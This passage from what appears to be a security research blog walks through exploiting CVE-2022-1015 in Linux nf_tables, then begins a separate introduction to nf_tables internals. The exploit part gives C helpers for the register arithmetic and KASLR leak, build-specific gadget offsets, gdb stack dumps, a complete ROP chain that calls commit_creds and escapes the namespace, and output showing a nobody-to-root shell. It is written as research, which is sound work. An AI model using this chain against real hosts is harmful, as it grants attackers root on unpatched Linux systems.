      sreg = 0xfffffffe (0x3e8 / 4 = 0xfa, but the parser will decrease it by 4, so we add 4 preemptively: 0xfa + 4 = 0xfe)
      dreg = NFT_REG32_01
      len = 0x20 (larger than the 8 bytes we need, so that the sum in the validation check wraps around)
      bitwise_shift_type = NFT_BITWISE_RSHIFT or NFT_BITWISE_LSHIFT
      data = 0 (shift value must be 0)
    
  
  payload_set expression
    
      sreg = NFT_REG32_01
      base = NFT_PAYLOAD_TRANSPORT_HEADER (this base is targeting the UDP header)
      offset = 8 (the UDP header is 8 bytes, we want to be writing right after it - where the payload is)
      len = 8 (the address is 8 bytes)
    
  


Those expressions make a rule that is added to the output chain. 
For the sake of reducing noise, I also added an expression of type nft_cmp_expr at the beginning of the rule to check the destination port before performing the other expressions. That would make sure we are not writing to some other UDP packet.
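The sreg value used in the bitwise expression can be derived mechanically from the stack offset we want to read. This is a sketch with helper names of my own; it only covers real indexes up to 0xfb, since higher ones need a base such as 0x3fffffXX as explained earlier.

```c
#include <assert.h>
#include <stdint.h>

/* Attribute value that makes the u8 register point `offset` bytes past the
 * start of nft_regs: offset / 4 is the real index, the 0xffffff00 base makes
 * the later multiplication by 4 wrap, and + 4 undoes the parser's subtraction. */
uint32_t sreg_for_offset(uint32_t offset)
{
	uint32_t index = offset / 4u;

	assert(offset % 4u == 0 && index <= 0xfbu);
	return (0xffffff00u | index) + 4u;
}

/* Smallest len for which reg * 4 + len wraps around to zero and passes. */
uint32_t min_len_for_sreg(uint32_t sreg)
{
	uint32_t real = sreg - 4u;

	return 0u - real * 4u;
}
```

For the offset 0x3e8 this yields sreg = 0xfffffffe and a minimum len of 0x18, which is why a len of 8 would be rejected while 0x20 goes through.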

After we have set up the rule the only thing left is to spin up a UDP listener and send a UDP packet with an 8-byte payload - the address is going to be written over the 8-byte payload. Then we receive the packet and read the address from it.
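Once the packet is received, turning its payload into the kernel base is a single subtraction. The sketch below assumes that the gdb session shown above ran with the kernel at base 0xffffffff81000000, so that the leaked address 0xffffffff819bfc63 sits at offset 0x9bfc63; both the macro and the function name are mine, and the offset is only valid for this particular build.

```c
#include <stdint.h>
#include <string.h>

/* Assumed offset of the leaked .text address from the kernel base:
 * 0xffffffff819bfc63 - 0xffffffff81000000. Build-specific. */
#define LEAK_OFFSET 0x9bfc63ull

/* Interpret the 8-byte UDP payload as the leaked pointer and rebase it. */
uint64_t kernel_base_from_payload(const unsigned char payload[8])
{
	uint64_t leak;

	/* the bytes were copied straight off the stack, so they are in native order */
	memcpy(&leak, payload, sizeof(leak));
	return leak - LEAK_OFFSET;
}
```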

Now that we have defeated KASLR it is time we move towards our goal - gaining kernel-space code execution and achieving Local Privilege Escalation.

Road to Code Execution 
Now that we have figured out how to leak the kernel address we need to figure out how to achieve Arbitrary Code Execution.

When we talked about primitives we established that nft_payload is the best expression for OOB write as we can write up to 0xff bytes - nearly 32 eight-byte words.

Ideally, we want to be able to write at least 20-something words on the stack without crashing. In reality, this is a bit more difficult than it seems.

Output hook + UDP packet 
Let us look more closely at the stack layout when using an output chain and a UDP packet. We found a .text address at a nice location there so maybe if it is a saved return address we could inject an ROP chain at that location.

gdb-peda$ x/40gx ($rsp+0x50+0x308)
0xffffc90000227cb8:     0x0000000000000000      0x0000000000000000
0xffffc90000227cc8:     0x0000000000000000      0x000000000100007f
0xffffc90000227cd8:     0x0000000000000000      0x00000000ffff0000
0xffffc90000227ce8:     0x0000000000000000      0x0000000100000001
0xffffc90000227cf8:     0x0011000000000000      0x0000000000000001
0xffffc90000227d08:     0x0000000000000000      0x0000000000000000
0xffffc90000227d18:     0x0100007f0100007f      0xffff8880699c55c3
0xffffc90000227d28:     0x0000000000000000      0x0000000000000000
0xffffc90000227d38:     0x000000100000ffff      0x0000000000000000
0xffffc90000227d48:     0x00008800ffff0000      0x0000000000000000
0xffffc90000227d58:     0x0000ee4700000000      0x0000000000000000
0xffffc90000227d68:     0xffff8880052d0480      0xffff8880052d0508
0xffffc90000227d78:     0x0000000000000008      0xffff8880052d0480
0xffffc90000227d88:     0x0000000000000004      0x0000000000000000
0xffffc90000227d98:     0xffffffff819bfc63      0xffff88800e233c00
0xffffc90000227da8:     0x3175125abbd91100      0xffff88800e233c00
0xffffc90000227db8:     0xffffc90000227df8      0xffff88800e233c00
0xffffc90000227dc8:     0x0000000000000010      0x0000000000000004
0xffffc90000227dd8:     0x0000000000000000      0xffffc90000227e28
0xffffc90000227de8:     0xffffffff819b7ab7      0xffffffff819b7ab7


Looking at the stack right after the address we leaked we see that at location 0xffffc90000227da8 there is an obvious stack canary.

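We have .text addresses at 0xffffc90000227de8 and 0xffffc90000227df0. Let’s look at what offsets they are. The first one is 0x438 bytes away from the start of nft_regs and the other one is 0x440. Both sit behind the canary at offset 0x3f8, and the highest offset a write can start from is 0x3fc (register index 0xff), so we cannot reach them without clobbering part of the canary.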

So obviously the output hook is not an option in our case.

Trying the other hooks 
After it became obvious that the output hook cannot be used on this kernel build, I started looking into other hooks. I tried the input, prerouting and postrouting hooks - that is, all of them except the ingress and forward hooks. After reviewing the stack on all of them I realised none of them have a favourable stack layout (using UDP packets). This was quite disappointing as I had invested a lot of time attempting to do it using UDP packets on the different hooks.

On the prerouting hook I even attempted to split the ROP chain around the stack canary and jump between the two ROP chains - but that also did not work as I could not pass the validation while keeping the length low enough as to not overwrite the stack canary.

After having spent a lot more time than I should have trying to make it work on one of the hooks I decided to look into the stack layout when TCP packets go through the rules.

Exploitation vector through TCP 
One of the reasons I worked so hard to make it work with UDP rather than attempting TCP earlier was because TCP requires a connection to be initiated and that is an extra burden we have to deal with.

Another reason I had to avoid TCP is the fact that the stack might differ between different TCP packets due to different flags being set in their headers. And indeed I observed this behaviour. It could also be viewed as a positive rather than a negative - the more different stack layouts we can get the better the chance that one might be exploitable.

First, of course, I tried the output hook. I used a normal SOCK_STREAM socket. While debugging I realised that the stack layout when sending a data packet is not favourable. However, I saw something very interesting… The stack layout looked favourable when the ACKnowledgement packet of the connection initialization was being handled.

Now the obvious next step is to include the payload in the ACK packet that is sent during initialization. To do that I had to use raw sockets and build manually the headers for the SYN and ACK packet. That allowed me to include a payload to the ACK packet where I wouldn’t be able to do that via a SOCK_STREAM socket.

Weirdly the stack layout changed when using a raw socket - it did not look as it did when I was using a normal SOCK_STREAM socket. That was weird… however it wasn’t an obstacle as the new stack layout was also vulnerable. Let’s take a look at it.

gdb-peda$ x/42gx ($rsp+0x50+0x308)
0xffffc90000237d78:     0x0000000000000001      0xffffea0000086d40
0xffffc90000237d88:     0x0000000000000000      0x0000000000000000
0xffffc90000237d98:     0x0000000000000000      0x0000000000000000
0xffffc90000237da8:     0x885b22be57fdfb00      0xffff88800e266e00
0xffffc90000237db8:     0xffffc90000237df8      0xffff88800e266e00
0xffffc90000237dc8:     0x0000000000000010      0x0000000000000006
0xffffc90000237dd8:     0x0000000000000000      0xffffc90000237e28
0xffffc90000237de8:     0xffffffff819b7ab7      0xffffffff819b7ab7
0xffffc90000237df8:     0x0000000000000000      0x00007f1e7f701df0
0xffffc90000237e08:     0xffffffff819b99c8      0x0000000100000000
0xffffc90000237e18:     0x00007f1e78002bc0      0x00000000000000f4
0xffffc90000237e28:     0xffffc90000237e88      0xffff888000000010
0xffffc90000237e38:     0x0000000000000005      0x0000000000000000
0xffffc90000237e48:     0x0000000000000000      0xffffc90000237e28
0xffffc90000237e58:     0x0000000000000000      0x0000000000000000
0xffffc90000237e68:     0x0000000000000255      0x0000000000000000
0xffffc90000237e78:     0x0000000000000000      0x00007f1e78003bc8
0xffffc90000237e88:     0x0100007f56c30002      0x0000000000403f1c
0xffffc90000237e98:     0xffffffff812b14d5      0x0000000000000255
0xffffc90000237ea8:     0x0000000000000006      0xffffc90000237f58
0xffffc90000237eb8:     0x00007f1e78003bc8      0xffff888003e33300


As you can see, there are two .text addresses at 0xffffc90000237de8 and 0xffffc90000237df0. After debugging a little it became clear that the second one is a saved return address. There is also no stack cookie in sight after it.

That address is at offset 0x390 from the beginning of nft_regs. That is within the bounds of our nft_payload OOB write.

Our upper bound for the OOB write is 0x450. That leaves us with the ability to write 0xc0 = 192 bytes on the stack. That is 24 words. It should be more than enough for a full ROP chain.

Building an ROP chain 
Now that we have the payload injection sorted it is time we start building an ROP chain.
Our ROP chain could be split into three stages - preparing credentials, leaving the namespace sandbox and returning to userland.

First, we need to set up our kernel credentials.

prepare_kernel_cred 
We need to call prepare_kernel_cred passing NULL as the argument. If NULL is supplied then the credentials will be set to 0 with no groups, full capabilities and no keys.

To do that we need to know the address of prepare_kernel_cred. On my kernel build it is located at offset 0x108aa0 from the kernel base address. According to the x86_64 calling convention, the first argument is passed in the rdi register.



So we need just a single gadget here - to pop rdi. The return value of the prepare_kernel_cred function would of course be saved in the rax register as per the convention.

In total for the prepare_kernel_cred part we would need to pass 3 words.

I found a suitable gadget to pop the rdi register - 0xffffffff81004616 : pop rdi ; ret.
So the offset from the kernel base would be 0x004616.

commit_creds 
After we have prepared the credentials we need to actually install them upon the current task. To do that we need to call commit_creds.

We have the credentials in the rax register. However, we need to pass them to the commit_creds function. To do that we need to move the rax register to the rdi register. The function is located at offset 0x108870 from the kernel base. To move rax to rdi we need a mov rdi, rax gadget. That means that it would take only 2 words to call commit_creds.

There is one small problem though. There is no mov rdi, rax ; ret gadget. The best I could find was the following
0xffffffff81020b1d : mov rdi, rax ; mov eax, ebx ; pop rbx ; or rax, rdi ; ret

It is at offset 0x020b1d from the kernel base.
The gadget requires us to pass one dummy value for the rbx register.
That would bring the total size of this stage of the ROP chain to 3 words.
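Put together, the two credential stages occupy six words. The following sketch lays them out using only the offsets quoted above, which are specific to my kernel build; the macro and function names are made up for this illustration.

```c
#include <stddef.h>
#include <stdint.h>

/* Offsets from the kernel base quoted in the text; valid for this build only. */
#define OFF_POP_RDI             0x004616ull /* pop rdi ; ret */
#define OFF_PREPARE_KERNEL_CRED 0x108aa0ull
#define OFF_MOV_RDI_RAX         0x020b1dull /* mov rdi, rax ; ... ; pop rbx ; ... ; ret */
#define OFF_COMMIT_CREDS        0x108870ull

/* Writes the credential stages into chain[] and returns the number of words used. */
size_t build_cred_stages(uint64_t kbase, uint64_t *chain)
{
	size_t i = 0;

	/* prepare_kernel_cred(NULL): 3 words */
	chain[i++] = kbase + OFF_POP_RDI;
	chain[i++] = 0;                          /* rdi = NULL */
	chain[i++] = kbase + OFF_PREPARE_KERNEL_CRED;

	/* commit_creds(rax): 3 words, including the dummy consumed by pop rbx */
	chain[i++] = kbase + OFF_MOV_RDI_RAX;
	chain[i++] = 0;                          /* dummy rbx */
	chain[i++] = kbase + OFF_COMMIT_CREDS;

	return i;
}
```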

switch_task_namespaces 
To exploit this vulnerability we needed the capability CAP_NET_ADMIN. We gained it by putting our process in a sandbox - with a user+network namespace. Now it is time to escape our sandbox and leave the namespace.

To do this we are going to use switch_task_namespaces. On my build, the entry of that function is at offset 0x107030 from the kernel base.

We have to pass two things to the function - the task whose namespaces we want to switch and the struct nsproxy that holds the namespaces that we are switching to.

We are going to find the task of our process by passing its pid to find_task_by_vpid. That would return a pointer to a task_struct. This pointer is our first argument to switch_task_namespaces.

The structure nsproxy contains pointers to all (net, mnt, pid, cgroup, etc) per-process namespaces. It essentially defines what namespaces a process uses. Every time a namespace of a process is changed it copies the existing nsproxy and modifies it. So all nsproxy instances can be thought of as modifications of an initial one - that of the init process. The initial nsproxy can be accessed with init_nsproxy. It is the second argument we pass to switch_task_namespaces.

Let’s see which gadgets are needed to do all of this and how many words we are going to need for this part.

We need 3 words to get the pointer to the task_struct. One gadget to pop rdi, a word to actually pass the pid of our process and one word to call find_task_by_vpid.

To call switch_task_namespaces we would need 5 words. We use a gadget that performs mov rdi, rax - because rax holds the pointer to the task_struct and we want to pass it as a first argument. However, the gadget that I am using has an unnecessary pop in it therefore I need to pass one dummy register. That brings it to two words so far. I need two more words to pass init_nsproxy as a second argument - one for the pop rsi gadget and one for the address of init_nsproxy. And finally, I need a 5th word to call switch_task_namespaces.

In total this stage would require 8 words.

swapgs_restore_regs_and_return_to_usermode 
Now that we have set up our credentials it is time to return execution to usermode. To do that we are going to use this function as a KPTI trampoline. But why do we need to use a trampoline?

Well we need to swap our GS register. The GS register in the Linux Kernel is used for per-CPU data structures. We need to swap it as we are moving from kernel-space to user-space.

We also need to swap the page tables to the userland ones. That is due to the Kernel Page Table Isolation feature. It separates user-space and kernel-space page tables - from user-space you can see only user-space pages and minimal kernel-space mappings. From kernel-space however you can see both user-space and kernel-space pages but the user-space pages are not executable. That means that if we don’t swap the page tables we cannot return execution to a function from user-space.

The function swapgs_restore_regs_and_return_to_usermode is called a KPTI trampoline because it swaps the GS register for us, changes the page tables and allows us to pass an IRET frame (Interrupt Return frame). Using the IRET frame we can set the Stack Segment (SS) register, the Stack Pointer (RSP), the RFLAGS register, the Code Segment (CS) register and most importantly - the instruction pointer (RIP).

As the RIP we pass a pointer to a function that will spawn a shell. The rest of the registers we can save before we send the payload and then simply restore to the values they had before we entered kernel-space.

Let’s take a look at the generated assembly of swapgs_restore_regs_and_return_to_usermode:
0xffffffff81e00ff0 <+0>:     pop    r15
0xffffffff81e00ff2 <+2>:     pop    r14
0xffffffff81e00ff4 <+4>:     pop    r13
0xffffffff81e00ff6 <+6>:     pop    r12
0xffffffff81e00ff8 <+8>:     pop    rbp
0xffffffff81e00ff9 <+9>:     pop    rbx
0xffffffff81e00ffa <+10>:    pop    r11
0xffffffff81e00ffc <+12>:    pop    r10
0xffffffff81e00ffe <+14>:    pop    r9
0xffffffff81e01000 <+16>:    pop    r8
0xffffffff81e01002 <+18>:    pop    rax
0xffffffff81e01003 <+19>:    pop    rcx
0xffffffff81e01004 <+20>:    pop    rdx
0xffffffff81e01005 <+21>:    pop    rsi
0xffffffff81e01006 <+22>:    mov    rdi,rsp
0xffffffff81e01009 <+25>:    mov    rsp,QWORD PTR gs:0x6004
0xffffffff81e01012 <+34>:    push   QWORD PTR [rdi+0x30]
0xffffffff81e01015 <+37>:    push   QWORD PTR [rdi+0x28]
0xffffffff81e01018 <+40>:    push   QWORD PTR [rdi+0x20]
0xffffffff81e0101b <+43>:    push   QWORD PTR [rdi+0x18]
0xffffffff81e0101e <+46>:    push   QWORD PTR [rdi+0x10]
0xffffffff81e01021 <+49>:    push   QWORD PTR [rdi]
...
0xffffffff81e01069 <+121>:   pop    rax
0xffffffff81e0106a <+122>:   pop    rdi
0xffffffff81e0106b <+123>:   swapgs
...

Looking at the generated assembly we see that a lot of registers are popped at the start. We wouldn’t want to pass that many dummy values in the ROP chain, so we are going to enter the function at offset <+22>, where the first mov instruction is. However, we will still have to pass two dummy values for the pop instructions at <+121> and <+122>.

The order of the values that we pass in the IRET frame should be RIP, CS, RFLAGS, SP, SS.

So in total, this part of the ROP chain would take us:

  1 word to pass the address of swapgs_restore_regs_and_return_to_usermode+22
  2 dummy words for rax and rdi
  5 words for the IRET frame.


In total 8 words.
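To make the layout of those 8 words a little more tangible, here is a minimal sketch that appends them to a payload buffer. The struct iret_frame, the helper append_trampoline_tail and the parameter trampoline_plus_22 are hypothetical names invented for this illustration - they are not taken from the PoC. The only thing the sketch relies on is the order described above.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

/* Field order matches the order given in the text: RIP, CS, RFLAGS, SP, SS. */
struct iret_frame {
	uint64_t rip;
	uint64_t cs;
	uint64_t rflags;
	uint64_t rsp;
	uint64_t ss;
};

/*
 * Hypothetical helper: appends the "return to userland" tail to a ROP
 * payload and returns the new word offset.
 * trampoline_plus_22 is assumed to be the runtime address of
 * swapgs_restore_regs_and_return_to_usermode+22.
 */
size_t append_trampoline_tail(uint64_t *payload, size_t offset,
			      uint64_t trampoline_plus_22,
			      const struct iret_frame *frame)
{
	assert(payload != NULL && frame != NULL);

	payload[offset++] = trampoline_plus_22;
	payload[offset++] = 0; /* dummy value popped into rax */
	payload[offset++] = 0; /* dummy value popped into rdi */
	payload[offset++] = frame->rip;
	payload[offset++] = frame->cs;
	payload[offset++] = frame->rflags;
	payload[offset++] = frame->rsp;
	payload[offset++] = frame->ss;
	return offset;
}
```

Calling the helper with the saved userland cs, rflags, rsp and ss, and with rip pointing at the shell-spawning function, advances the offset by exactly 8 words.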

Summarizing the ROP chain 
The total size of the ROP chain in my case is 23 words. The size will differ between builds due to gadget differences, etc.

int offset = 0;
// clearing interrupts
payload[offset++] = kbase + cli_ret;

// preparing credentials
payload[offset++] = kbase + pop_rdi_ret; 
payload[offset++] = 0x0; // first argument of prepare_kernel_cred
payload[offset++] = kbase + prepare_kernel_cred;

// committing credentials
payload[offset++] = kbase + mov_rdi_rax_pop_rbx_ret;
payload[offset++] = 0x0; // dummy rbx
payload[offset++] = kbase + commit_creds;

// switching namespaces
payload[offset++] = kbase + pop_rdi_ret;
payload[offset++] = process_id;
payload[offset++] = kbase + find_task_by_vpid;
payload[offset++] = kbase + mov_rdi_rax_pop_rbx_ret;
payload[offset++] = 0x0; // dummy rbx
payload[offset++] = kbase + pop_rsi_ret;
payload[offset++] = kbase + init_nsproxy;
payload[offset++] = kbase + switch_task_namespaces;

// returning to userland - the offset used below is expected to point at <+22>, past the initial pops
payload[offset++] = kbase + swapgs_restore_regs_and_return_to_usermode;
payload[offset++] = 0x0; // dummy rax
payload[offset++] = 0x0; // dummy rdi
payload[offset++] = (unsigned long)spawnShell;
payload[offset++] = user_cs;
payload[offset++] = user_rflags;
payload[offset++] = user_sp;
payload[offset++] = user_ss;


This is the complete ROP chain.

Proof-of-Concept 
The PoC is available at https://github.com/ysanatomic/CVE-2022-1015.

# ./exploit
[*] CVE-2022-1015 LPE Exploit by @YordanStoychev

uid=65534(nobody) gid=65534(nobody) groups=65534(nobody)
[*] Setting up user+network namespace sandbox

[+] STAGE 1: KASLR bypass 
[*] Socket is opened.
[*] Table leak_table created.
[*] Chain output_chain created.
[*] Bitwise expression is setup!
[*] Payload expression is setup!
[*] Verdict is setup!
[*] Address leak rule created!
[*] Packet sent... if no output in a second - it has failed
[*] Listening on port 50005
[&] Leaked Address: 0xffffffff819bfc63
[&] Kernel base address: 0xffffffff81000000

[+] STAGE 2: Escalation
[*] Socket is opened.
[*] Table rop_table created.
[*] Chain output_chain created.
[*] Copy ROP-to-Stack rules created.
[*] Saved userland registers
[#] cs: 0x33
[#] ss: 0x2b
[#] rsp: 0x7ffd969d1da0
[#] rflags: 0x246

[*] TCP Listener and client threads created!
[+] TCP server socket created.
[+] Bind to the port number: 50006
[*] Listening...
[*] Successfully sent 60 bytes SYN!
[*] Successfully received 48 bytes SYN-ACK!
[*] Sending an ACK packet with the payload...
[***] Exploit ran successfully
uid=0(root) gid=0(root)
#


Closing Remarks 
This vulnerability was extremely interesting to re-discover. The nf_tables codebase seems complicated at first but is remarkably simple once you know your way around.

The exploitation stage can be described as a big dose of educational fun even if frustrating at times - especially while hunting for a good hook where the stack is favourable to exploitation.

Massive thanks to David Bouman. His write-up was very educational - especially the overview of nf_tables that kick-started my research.

I hope this write-up was as much fun to read as it was for me to write it.

Feel free to contact me on Twitter or via email if you have any questions.


Dissecting the Linux Firewall: Introduction to Netfilter’s nf_tables
2022-11-01T12:00:00+00:00
Introduction
Hello there!

This is an introduction to Netfilter’s nf_tables. While it isn’t a complete study of the internals it can give you a solid base before you start your own research into the module. Or maybe you have experience using tools like iptables and nft and want to see what happens behind the curtain - this article is for you as well.

While I have tried to make it as accessible as possible the article assumes basic knowledge of C and the Linux Kernel.

Table of Contents

  What is Netfilter and nf_tables?
  Building Blocks of the Firewall
      Rules
      Chains
      Tables
      Expressions
  Registers
      Data registers
      Verdict register and codes
  Taking a quick look at nft_do_chain
  Expressions
      nft_immediate_expr
      nft_payload
      nft_payload_set
      nft_cmp_expr
      nft_bitwise
      nft_meta
      nft_byteorder
      nft_range_expr
      An example
  Netfilter Hooks
  The Libraries - libnftnl and libmnl
      libmnl
      libnftnl
  Closing remarks and acknowledgements


What is Netfilter and nf_tables? 
Netfilter is a framework in the Linux Kernel. It allows various network operations to be implemented in the form of handlers attached to hooks. It can be used for packet filtering, Network Address Translation or port translation.
In general it can be summarized as a framework that lets you direct, modify and control the flow of traffic in a network.

Many userspace programs use netfilter. The most common perhaps is iptables.

The subsystem we will be reviewing is nf_tables. It is responsible for filtering and rerouting packets. It is commonly used for building firewalls as you can create complex rules through which to decide what happens with traffic - if it has to be refused, redirected, modified or accepted.

You can also write your own userspace programs that use the nf_tables subsystem. For that purpose a library has been developed that significantly simplifies the process - libnftnl (which requires the library libmnl). More on that later.

  Note: libmnl and libnftnl also simplify the development of exploits targeting nf_tables :D


Build a table, assemble a chain, form rules and decide on expressions 
When we talk about netfilter internals we will constantly mention expressions used in rules which form chains that are part of tables. 
That might sound a little bit intimidating but don’t worry we will go over everything.

Rules  
Rules are defined almost perfectly by their name: they are the rules by which packets are filtered, such as checks on the protocol, the source, the destination, the port, etc. Rules have a verdict - you can decide if you want to drop the packet, reject it or just accept it and go down the chain of rules.


  Example: “udp dport 50001 drop” If the protocol is UDP and the destination port is 50001 it will drop the packet.


In the future when we talk about a rule being “executed” we essentially mean that the packet going through is being evaluated against the rule to determine if the packet fits the rule or not.

Chains  
Chains are essentially linear structures of rules. After one rule is checked it goes to the next one. Sometimes the verdict might make the execution jump to another chain. However we always have a base chain. 
A base chain is where the execution begins from. If there is a rule that checks if the protocol is UDP you can make it so that the execution jumps to another chain that has just rules for UDP packets.

Execution always begins from a base chain because they are the chains attached to a netfilter hook. We will talk extensively about hooks later but they essentially show when a chain should be executed. If an input hook is being used then the chain will be executed against incoming packets - if an output hook - against outgoing packets.

Tables  
Tables are the top-level structures. They contain the chains. Chains can only jump to another chain on the same table.

Tables belong to a particular family. The family defines what type of packets will be handled by the chains in the table.
The families are - ip, ip6, inet, arp, bridge, netdev.

Tables belonging to the families ip and ip6 see only IPv4 and IPv6 packets respectively. The inet family allows a table to see both IPv4 and IPv6 packets.

The arp family allows tables to see ARP-level traffic while tables belonging to the bridge family only see packets traversing bridges.

The netdev family allows base chains to be attached to a particular network interface. Such base chains will then see all network traffic on that interface. That means that ARP traffic can be handled from here as well. The netdev family is only used when the base chains of the table will use the ingress hook but more on that later.

Expressions  
Expressions are like little operations where you can pass the arguments. They perform actions on packets. Expressions, executed (or rather evaluated) one after another form a rule.
An example of an expression is the payload expression nft_payload. It copies data from the packet’s headers and saves it into the registers.
The registers are like a local data storage that you can write to and read from with expressions. They can be used to pass data between expressions.

So in conclusion: Expressions are operators we can use by providing them with arguments. Multiple expressions that will be evaluated one after the other form a rule. Multiple rules chained together form a chain.

  Ex: If we have the rule udp dport 50001 drop:
  First we check with an expression whether the protocol is UDP.
  Then we check with another expression whether the destination port is 50001.
  Finally, if both are true, we use another expression to drop the packet - by setting a verdict.


Registers 
We will now take a look at a very essential part - The Registers.
Registers store data. That data can be accessed or modified by expressions by targeting a specific register.
Although registers can be viewed as separate it is most of the time useful to see them as one continuous buffer of data where the register index is just an offset of the buffer.

But how much data can we store in the registers? That part might be a little bit confusing.

Originally there were five 16 byte registers. One verdict register and four data registers - each is 16 bytes. In total 80 bytes.

  Verdict (16) + 4 * data (16) = 80


But now things are a little different - there is still one 16-byte verdict register, but the data registers can now also be addressed as sixteen registers of 4 bytes each.

  Verdict(16) + 16 * data (4) = 80


Data registers 
So the data registers used to be four - each 16 bytes. Now they are sixteen - each 4 bytes.

We can view the registers as one continuous buffer of data where the registers are just offsets in that buffer.
Well that would mean we just have two types of offsets. The first type is every 16 bytes. The second type is every 4 bytes.

Let’s take a look at the registers’ enum type - it defines the offsets.
enum nft_registers {
	NFT_REG_VERDICT,
	NFT_REG_1,
	NFT_REG_2,
	NFT_REG_3,
	NFT_REG_4,
	__NFT_REG_MAX,

	NFT_REG32_00	= 8,
	NFT_REG32_01,
	NFT_REG32_02,
	...
	NFT_REG32_13,
	NFT_REG32_14,
	NFT_REG32_15,
};

NFT_REG_1 to NFT_REG_4 are the 16 byte offsets while NFT_REG32_00 to NFT_REG32_15 are the 4 byte ones.
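The "one continuous buffer" view can be sketched as a function that turns a register number into a byte offset inside the 80-byte buffer. This is only an illustration: the constants are copied from the enum above under shortened names, and reg_to_byte_offset is a hypothetical helper, not a kernel function. It assumes that NFT_REG32_00 starts right after the verdict register, at the same place as NFT_REG_1.

```c
#include <assert.h>
#include <stddef.h>

/* Values mirror the enum shown above (names shortened for the sketch). */
enum {
	REG_VERDICT = 0,
	REG_1 = 1,
	REG_4 = 4,
	REG32_00 = 8,
	REG32_15 = 23,
};

#define REG_SIZE   16 /* size of a 16-byte register */
#define REG32_SIZE 4  /* size of a 4-byte register */

/*
 * Hypothetical helper: translate a register number into a byte offset
 * inside the 80-byte register buffer.
 */
size_t reg_to_byte_offset(unsigned int reg)
{
	/* Only the verdict, REG_1..REG_4 and REG32_00..REG32_15 are valid. */
	assert(reg <= REG_4 || (reg >= REG32_00 && reg <= REG32_15));

	if (reg <= REG_4)
		return (size_t)reg * REG_SIZE;

	/* REG32_00 aliases the start of REG_1, right after the verdict. */
	return REG_SIZE + (size_t)(reg - REG32_00) * REG32_SIZE;
}
```

With this mapping NFT_REG_1 and NFT_REG32_00 both land on byte 16, and NFT_REG32_15 lands on byte 76, so the last 4-byte register ends exactly at byte 80.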



We have mentioned the verdict register multiple times. So let’s talk about it.

Verdict register 
The verdict register sits at offset zero in the registers. The size of the verdict register is 16 bytes. During each rule a verdict can be set for the packet. The verdict can be set to the following values:

  NFT_CONTINUE - the default verdict. While the verdict stays NFT_CONTINUE, evaluation simply moves on to the next expression and then to the next rule; if the end of the base chain is reached this way, the chain’s policy decides what happens to the packet. If the verdict is set to anything but this -> no more expressions will be executed in the rule. Depending on the verdict that might mean that we just continue down the other rules, go to another chain or completely drop the packet.
  NFT_BREAK - the rest of the expressions in the rules are skipped but then it goes down the rules in the chain normally.
  NF_DROP - drop the packet - no more expressions will be performed.
  NF_ACCEPT - accepts the packet preemptively.
  NFT_GOTO - go to another chain and go through the rules there. It does not return to the current chain.
  NFT_JUMP - jump to another chain and go through the rules there. If the verdict at the end of that chain is NFT_CONTINUE, the packet returns to the original chain and continues with the remaining rules in it.
    
      Verdicts like NF_DROP and NF_ACCEPT (and the unmentioned NF_STOLEN and NF_QUEUE) are simply returned to the caller, which then decides what to do with the packet.
    
  


For example, if the verdict is set to NFT_JUMP, execution jumps to another chain in the table and the rules in that chain are checked against the packet going through the firewall.
So the verdict register controls the fate of our packet - which chains it goes through and finally whether it is allowed or not. In other words, the verdict controls the execution flow.

However, the internal structure of the verdict register is, I fear, a little bit more confusing.
As we said, it is 16 bytes. The first 4 bytes are the actual verdict code. Those 4 bytes take the values we just talked about.
The other 12 bytes are used if the verdict is NFT_JUMP or NFT_GOTO: they hold the pointer to the destination chain (on a 64-bit build that is 4 bytes of padding followed by the 8-byte pointer).
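A rough way to convince yourself of that layout is to model it in userspace. The types below are simplified stand-ins invented for this sketch (they are not the kernel definitions): a 4-byte code followed by a chain pointer, overlaid on four 32-bit words.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

struct chain_sketch; /* opaque stand-in for the destination chain */

/* Simplified stand-in for the verdict: a code plus a chain pointer. */
struct verdict_sketch {
	uint32_t code;              /* NFT_CONTINUE, NF_DROP, NFT_JUMP, ... */
	struct chain_sketch *chain; /* only meaningful for NFT_JUMP / NFT_GOTO */
};

/* Simplified stand-in for the 16-byte verdict register. */
union verdict_reg_sketch {
	uint32_t words[4];
	struct verdict_sketch verdict;
};

/* Hypothetical helper: byte offset of the chain pointer in the register. */
size_t verdict_chain_offset(void)
{
	return offsetof(struct verdict_sketch, chain);
}

/* Sanity check: the overlay must not grow past 16 bytes. */
void verdict_layout_check(void)
{
	assert(sizeof(union verdict_reg_sketch) == 16);
}
```

On a typical 64-bit build the pointer is aligned to 8 bytes, so verdict_chain_offset() returns 8: bytes 0-3 hold the code, bytes 4-7 are padding and bytes 8-15 hold the chain pointer.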

Taking a quick look at nft_do_chain 
Now that we have established what the main building blocks are - expressions, rules, chains and tables - and talked a bit about how the execution flow is controlled through verdicts, let’s take a look at nft_do_chain - the function that actually goes through the rules in a chain and executes their expressions. The snippet below contains the code of the function with some added comments to explain its behavior:
unsigned int
nft_do_chain(struct nft_pktinfo *pkt, void *priv)
{
	const struct nft_chain *chain = priv, *basechain = chain;
	const struct nft_rule_dp *rule, *last_rule;
	const struct net *net = nft_net(pkt);
	const struct nft_expr *expr, *last;
	struct nft_regs regs = {};
	unsigned int stackptr = 0;
	struct nft_jumpstack jumpstack[NFT_JUMP_STACK_SIZE];
	bool genbit = READ_ONCE(net->nft.gencursor);
	struct nft_rule_blob *blob;
	struct nft_traceinfo info;

	info.trace = false;
	if (static_branch_unlikely(&nft_trace_enabled))
		nft_trace_init(&info, pkt, &regs.verdict, basechain);
do_chain:
	if (genbit)
		blob = rcu_dereference(chain->blob_gen_1);
	else
		blob = rcu_dereference(chain->blob_gen_0);

	rule = (struct nft_rule_dp *)blob->data;
	/* we get the last rule so we know when to stop the processing */
	last_rule = (void *)blob->data + blob->size;
next_rule: // this section is executed every time there is a rule
	regs.verdict.code = NFT_CONTINUE; // the default verdict code = NFT_CONTINUE
	for (; rule < last_rule; rule = nft_rule_next(rule)) { // iterate through the rules
		/* iterate through the expressions */
		nft_rule_dp_for_each_expr(expr, last, rule) {
			// execute the expression
			if (expr->ops == &nft_cmp_fast_ops)
				nft_cmp_fast_eval(expr, &regs);
			else if (expr->ops == &nft_cmp16_fast_ops)
				nft_cmp16_fast_eval(expr, &regs);
			else if (expr->ops == &nft_bitwise_fast_ops)
				nft_bitwise_fast_eval(expr, &regs);
			else if (expr->ops != &nft_payload_fast_ops ||
				 !nft_payload_fast_eval(expr, &regs, pkt))
				expr_call_ops_eval(expr, &regs, pkt);
